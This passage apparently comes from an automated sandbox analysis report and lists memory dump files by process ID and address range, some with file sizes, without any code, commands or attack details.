                                                                                                      • memory/4864-243-0x0000000002415000-0x0000000002417000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4864-220-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4864-242-0x0000000002414000-0x0000000002415000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4864-241-0x0000000002412000-0x0000000002414000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4864-231-0x0000000002410000-0x0000000002412000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4876-232-0x0000000002D20000-0x0000000002D22000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4876-221-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4940-245-0x0000000002E95000-0x0000000002E96000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4940-227-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4940-233-0x0000000002E90000-0x0000000002E92000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4940-240-0x0000000002E92000-0x0000000002E94000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/5024-234-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5024-237-0x0000000000F40000-0x0000000000F4D000-memory.dmp
                                                                                                        Filesize

                                                                                                        52KB

                                                                                                      • memory/5044-247-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5088-264-0x00000000008B0000-0x00000000008C2000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/5088-265-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5088-259-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5088-263-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/5144-312-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5152-302-0x0000000003710000-0x0000000003720000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/5152-275-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5152-296-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/5208-331-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5232-350-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5396-326-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5584-347-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5708-289-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5808-306-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5884-330-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5904-332-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5904-333-0x0000000004B50000-0x0000000004C51000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.0MB

                                                                                                      • memory/5904-335-0x00000000033E0000-0x000000000343C000-memory.dmp
                                                                                                        Filesize

                                                                                                        368KB

                                                                                                      • memory/5912-327-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5944-317-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6156-351-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6208-352-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6276-353-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6312-359-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6316-360-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6352-361-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6484-354-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6536-355-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6536-363-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6568-364-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6600-365-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6688-368-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6780-356-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6792-366-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6828-369-0x0000000000402F68-mapping.dmp
                                                                                                      • memory/6888-367-0x0000000000000000-mapping.dmp
                                                                                                      • memory/7024-349-0x0000000000000000-mapping.dmp